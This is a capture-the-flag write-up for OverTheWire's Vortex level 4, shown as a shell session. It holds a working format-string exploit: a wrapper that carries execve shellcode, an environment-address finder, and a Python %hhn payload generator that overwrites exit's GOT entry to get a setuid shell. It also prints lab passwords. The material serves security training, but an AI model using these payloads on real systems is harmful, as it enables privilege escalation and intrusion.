# Vortex wargame: Level 4


# ssh vortex4@vortex.labs.overthewire.org
vortex4@vortex.labs.overthewire.org's password:32596d674b313d6a77

$ file /vortex/vortex4
/vortex/vortex4: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=11041f50a7845267e6d05f6f11dd37de0a33d423, not stripped

$ mkdir /tmp/v4
$ cd /tmp/v4
$ cat execve.c 
#include <unistd.h>

int main(int argc, char **argv){
 /* Launch argv[1] with a NULL argv and a hand-built environment.
  * The target's main (see the gdb listing further down) only continues
  * when argc is 0, which is why no argv array is passed at all.
  * The env order is load-bearing: it decides where each string sits on
  * the target's stack.
  *   env[0]  empty entry
  *   env[1]  EGG=<payload bytes>; getenvaddr reports where it lands
  *   env[2]  argv[2] of this wrapper, i.e. the format string produced by
  *           format_string.py; with an empty argv this is presumably what
  *           the target's printf() ends up reading (the findinit run below
  *           echoes it back)
  *   env[3]  terminator
  * NOTE(review): argv[2] is read unconditionally; invoking this wrapper
  * with fewer than two arguments reads past the argv array. If execve()
  * fails, main falls off the end without reporting an error. */
 char *env[4];
 env[0]="";
 env[1]="EGG=\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
 env[2]=argv[2];
 env[3]=NULL;
 execve(argv[1], NULL, env);
}
$ gcc -m32 -o execve execve.c
$ cat getenvaddr.c
#include <stdio.h>

int main(int argc,char *argv[]){
        /* Report where the EGG environment string sits in this process; the
         * transcript below uses that as the guess for where the same string
         * lands in the target, re-running until the reported address stops
         * moving (the payload length changes with the address it encodes).
         * NOTE(review): getenv() is declared in <stdlib.h>, which is not
         * included here, so the call relies on an implicit declaration.
         * If EGG is unset, getenv() returns NULL and the printed address
         * is simply 0x3. */
        char *ptr;
        ptr = getenv("EGG");
 ptr += 3; /* fixed offset applied to the reported address */
        printf("%s will be at %p\n", "EGG", ptr);
        return 0;
}
$ gcc -m32 -o getenvaddr getenvaddr.c
$ cat format_string.py
#!/usr/bin/python

import sys
import struct

def whatprinted(what, printed):
 """Turn a target byte value into a `%Nc` width and the new running count.

 Given the byte `what` that the next `%hhn` must store and the number of
 characters `printed` so far, return the smallest positive width that,
 added to `printed`, equals `what` modulo 0x100, together with the total
 character count after that width has been emitted.

 Args:
  what: target byte value for the next write.
  printed: characters emitted before the `%Nc` directive.

 Returns:
  (width, printed + width)
 """
 if what <= printed:
  # Lift the target by whole multiples of 0x100 until it is strictly
  # above the running count; a byte-sized write keeps only the low
  # byte, so the value that lands in memory is unchanged.
  steps = (printed - what) // 0x100 + 1
  what += steps * 0x100
 width = what - printed
 return width, printed + width

def fs_4writes(what, where, printed, init):
 """Build a format string that writes the 32-bit value `what` to `where`.

 The payload starts with the four target addresses where, where+1,
 where+2, where+3 (little-endian), followed by four `%Nc` / `%M$hhn`
 pairs. Each `%Nc` pads the output so that the running character count,
 taken modulo 0x100, equals one byte of `what`; the following `%M$hhn`
 then stores that low byte through the M-th positional argument, i.e.
 through one of the addresses placed at the front.

 Args:
  what: 32-bit value to write, split into four bytes.
  where: address of the lowest byte to be written.
  printed: characters already output before the payload starts.
  init: positional (`%M$`) index of the first address; the remaining
   three are addressed as init+1 .. init+3.

 Returns:
  The payload as a Python 2 `str` (struct.pack returns str there).
  NOTE(review): this file is Python 2 (print statements below); under
  Python 3 the `bytes + str` concatenation in the return raises TypeError.
 """
 mask     = 0xff
 printed  = 16 + printed # (4 bytes * 4 where_addresses) + printed
 # Split the value into bytes, least significant first, matching the
 # order of the where .. where+3 addresses.
 what_b0  = (what      ) & mask
 what_b1  = (what >>  8) & mask
 what_b2  = (what >> 16) & mask
 what_b3  = (what >> 24) & mask

 # Turn each byte into the `%Nc` width that makes the output count reach
 # it; `printed` is carried forward from one write to the next.
 what_b0, printed = whatprinted(what_b0, printed)
 what_b1, printed = whatprinted(what_b1, printed)
 what_b2, printed = whatprinted(what_b2, printed)
 what_b3, printed = whatprinted(what_b3, printed)

 # NOTE(review): `where` is not range-checked; struct.pack('<I', ...)
 # raises struct.error once where + 3 exceeds 0xffffffff.
 return  struct.pack('<I',  where     ) + \
  struct.pack('<I', (where + 1)) + \
  struct.pack('<I', (where + 2)) + \
  struct.pack('<I', (where + 3)) + \
  ('%%%dc'    % what_b0  ) + \
  ('%%%d$hhn' % init     ) + \
  ('%%%dc'    % what_b1  ) + \
  ('%%%d$hhn' % (init + 1)     ) + \
  ('%%%dc'    % what_b2  ) + \
  ('%%%d$hhn' % (init + 2)     ) + \
  ('%%%dc'    % what_b3  ) + \
  ('%%%d$hhn' % (init + 3)     )

if len(sys.argv) == 7:
 # Usage (see the else branch): <mode> <what> <where> <printed> <init> <padding>
 #   what    - hex value to write; in the transcript, the address of EGG
 #   where   - hex address to write to; in the transcript, the GOT slot of
 #             exit (0804a014 in the readelf output)
 #   printed - characters output before the payload starts
 #   init    - positional (`%N$`) index of the first address on the stack
 #   padding - number of '#' bytes appended to the payload
 # NOTE(review): this is Python 2 code (print statements, str/bytes
 # mixing in fs_4writes) and does not run unchanged under Python 3.

 mode    = sys.argv[1]
 what    = int(sys.argv[2], 16)
 where   = int(sys.argv[3], 16)
 printed = int(sys.argv[4])
 init    = int(sys.argv[5])
 align   = int(sys.argv[6])

 fs = fs_4writes(what, where, printed, init)
 align = '#' * align  # the count is replaced by the padding string itself

 if mode == 'findinit':
  # Probe: dump stack slot `init` as hex, padded with '-' to the length of
  # the real payload so the stack layout is the same in the probe and in
  # the exploit run (the transcript below reads back "%104" at index 104).
  pop =   '%' + str(init) + '$x'
  pop += '-' * (len(fs) - len(pop))
  payload = pop + align
 elif mode == 'exploit':
  payload = fs  + align
 # NOTE(review): any other mode leaves `payload` unbound and the print
 # below raises NameError instead of showing the usage line.

 print payload
else:
 print sys.argv[0], '<mode> <what> <where> <printed> <init> <padding>'
$ gdb /vortex/vortex4
(gdb) set disassembly-flavor intel
(gdb) disassemble main
   0x0804844d <+0>: push   ebp
   0x0804844e <+1>: mov    ebp,esp
   0x08048450 <+3>: and    esp,0xfffffff0
   0x08048453 <+6>: sub    esp,0x10
   0x08048456 <+9>: cmp    DWORD PTR [ebp+0x8],0x0 argc =? 0
   0x0804845a <+13>: je     0x8048468 <main+27>
   0x0804845c <+15>: mov    DWORD PTR [esp],0x0
   0x08048463 <+22>: call   0x8048330 <exit@plt>
   0x08048468 <+27>: mov    eax,DWORD PTR [ebp+0xc]
   0x0804846b <+30>: add    eax,0xc
   0x0804846e <+33>: mov    eax,DWORD PTR [eax]
   0x08048470 <+35>: mov    DWORD PTR [esp],eax
   0x08048473 <+38>: call   0x8048310 <printf@plt>
   0x08048478 <+43>: mov    DWORD PTR [esp],0x0
   0x0804847f <+50>: call   0x8048330 <exit@plt>
$ readelf -r /vortex/vortex4

Relocation section '.rel.dyn' at offset 0x2ac contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2b4 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a014  00000307 R_386_JUMP_SLOT   00000000   exit
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main

$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
EGG will be at 0xffffdf83
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
EGG will be at 0xffffdf85
$ ./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
34303125------------------------------------------------------------##### %104 = init
$ ./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$ whoami
vortex5
$ /bin/cat /etc/vortex_pass/vortex5
3a3456746243346c72
